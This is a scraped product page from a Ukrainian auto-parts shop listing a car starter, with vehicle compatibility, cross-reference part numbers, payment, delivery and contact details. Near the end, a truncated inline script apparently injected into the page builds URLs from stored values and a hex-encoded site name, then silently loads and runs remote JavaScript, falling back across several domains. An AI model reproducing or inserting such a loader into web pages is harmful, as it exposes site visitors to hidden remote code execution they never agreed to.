AutoHouse

Автозапчасти для иномарок

+380505774778, +380721100122

Стартер Volkswagen Golf II III Caddy Golf II III Jetta Passat / Skoda / Seat Cordoba Toledo 1.6 1.8 2.0 /1.4кВт 9z/ CS615

Код товара: 0001108005
Наличие:
В наличии
Цена:
1250,00 грн./шт
Количество:
  

Применяемость в автомобилях:

LANCIA DEDRA 1.8i.e. 835A 2.046/2.000IAW-Inj. 1,8 01.89-10.94
LANCIA DEDRA 2.0i.e. 835A 5.000IAW-Inj./5.046 2,0 01.89-10.94
SEAT CORDOBA 1.6 AFT,1F 1,6 12.95-09.96
SEAT CORDOBA 1.8 ADZ 1,8 11.95-09.96
SEAT CORDOBA 2.0 2E 2,0 11.95-06.96
SEAT TOLEDO 1.6 ABN,EZ 1,6 01.92-09.91
SEAT TOLEDO 1.8 16V KR,PL 1,8 05.91-11.93
SEAT TOLEDO 2.0 2E 2,0 05.95-06.96
SEAT TOLEDO 2.0 16V ABF 2,0 03.94-03.99
SKODA OCTAVIA 1.6 AEE 1,6 09.96-09.04
VW (VOLKSWAGEN) CADDY 1.8 JH 1,8 08.85-07.92
VW (VOLKSWAGEN) CORRADO 1.8 16V KR 1,8 09.88-07.90
VW (VOLKSWAGEN) CORRADO 1.8 G60 PG 1,8 09.88-07.90
VW (VOLKSWAGEN) GOLF CABRIOLET 1.8 JH,2H,DX,KT 1,8 08.82-08.93
VW (VOLKSWAGEN) GOLF CABRIOLET 2.0 ADY,AGG 2,0 02.95-01.96
VW (VOLKSWAGEN) GOLF II 1.6 ABN,EZ,EZA 1,6 08.83-07.92
VW (VOLKSWAGEN) GOLF II 1.6 HM,PN,RF 1,6 08.83-07.92
VW (VOLKSWAGEN) GOLF II 1.8 EV,GZ,RG,RH 1,8 01.84-07.90
VW (VOLKSWAGEN) GOLF II 1.8 GU,RP,PB,PF 1,8 11.83-10.91
VW (VOLKSWAGEN) GOLF II 1.8 16V KR,PL 1,8 02.86-10.90
VW (VOLKSWAGEN) GOLF II 1.8 syncro RH,1P,GU,GX 1,8 02.86-07.90
VW (VOLKSWAGEN) GOLF III 1.4 AEX 1,4 07.95-12.97
VW (VOLKSWAGEN) GOLF III 1.6 AEA,AEK 1,6 03.95-12.97
VW (VOLKSWAGEN) GOLF III 1.6 AEE,AFT,AKS 1,6 07.95-12.97
VW (VOLKSWAGEN) GOLF III 1.8 AAM,ADZ 1,8 03.95-12.97
VW (VOLKSWAGEN) JETTA 1.6 EZ,EZA,HM,PN,RF 1,6 01.84-07.92
VW (VOLKSWAGEN) JETTA 1.8 EV,GZ,RG,RH 1,8 01.84-07.90
VW (VOLKSWAGEN) JETTA 1.8 GU,RP 1,8 01.84-07.90
VW (VOLKSWAGEN) JETTA 1.8 GX,HV,RD,PB,PF 1,8 01.84-10.91
VW (VOLKSWAGEN) JETTA 1.8 16V KR,PL 1,8 08.86-10.90
VW (VOLKSWAGEN) JETTA 1.8 syncro GX,RH,GU,1P 1,8 08.87-07.90
VW (VOLKSWAGEN) PASSAT 1.8 16V KR 1,8 04.88-07.91
VW (VOLKSWAGEN) PASSAT 2.0 16V 9A 2,0 08.88-07.90
VW (VOLKSWAGEN) POLO VARIANT 1.6 AFT 1,6 03.97-08.99
VW (VOLKSWAGEN) SCIROCCO 1.8 EX,JH,DX,KT 1,8 08.83-07.92
VW (VOLKSWAGEN) SCIROCCO 1.8 16V KR,PL 1,8 10.85-07.92
 
 
 
Аналоги:
BOSCH 0001107007
BOSCH 0001107008
BOSCH 0001108004
BOSCH 0001108005
BOSCH 0001108094
BOSCH 0001108095
BOSCH 0001108127
BOSCH 0001112003
BOSCH 0001112004
BOSCH 0001114005
BOSCH 0001114006
BOSCH 0001114012
BOSCH 0001208416
BOSCH 0001208417
BOSCH 0001208418
BOSCH 0001208419
BOSCH 0001211257
BOSCH 0001211258
BOSCH 0986012590
BOSCH 0986012598
BOSCH 0986012600
BOSCH 0986016230
FARYMANN DIESEL 547.376.1
FIAT 76683140
FIAT 7716197
HELLA 8EA 726 054-001
HELLA 8EA 730 185-001
HELLA CS 294
HELLA CS 615
LESTER 17025
LESTER 17134
LESTER 17222
LESTER 30560
LESTER 30561
LESTER 30562
VALEO 436 022
VW (VOLKSWAGEN) 055 911 023 F
VW (VOLKSWAGEN) 055 911 023 G
VW (VOLKSWAGEN) 055 911 023 GX
VW (VOLKSWAGEN) 055 911 023 HX
VW (VOLKSWAGEN) 055 911 023 J
VW (VOLKSWAGEN) 055 911 023 JX
VW (VOLKSWAGEN) 055 911 023 KX
VW (VOLKSWAGEN) 055 911 023 MX
 

 

<script>// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("podkapot.com.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]></script>

  • Дата публикации: 27.01.2014

Оплата

Способы оплаты: Наличными, Безналичный расчет, Наложенный платеж, Дополнительная информация о доставке: По факту оплаты - ОБЯЗАТЕЛЬНО перезвонит менеджер для дальнейшего оформления заказа. Способы оплаты: Безналичный расчет Оплата проводится на карту Приват банка Наложенный платеж Клиент делает предоплату в размере 10% от суммы заказа, а оставшуюся сумму оплачивает непосредственно при получении посылки у перевозчика. Предоплата в размере 10% берётся, как гарантия того, что клиент заберёт посылку.

Доставка

Способы доставки: Самовывоз, НОВА ПОШТА

Похожие запчасти
Новые поступления
Категории
Контакты
  • Название предприятия:
    AutoHouse
  • Город:
    Алчевск
  • Адрес:
    ул.Запорожская, 114к
  • Телефон:
    +380505774778, +380721100122
  • Контактное лицо:
    Андрей
AutoHouse

Автозапчасти для иномарок

+380505774778, +380721100122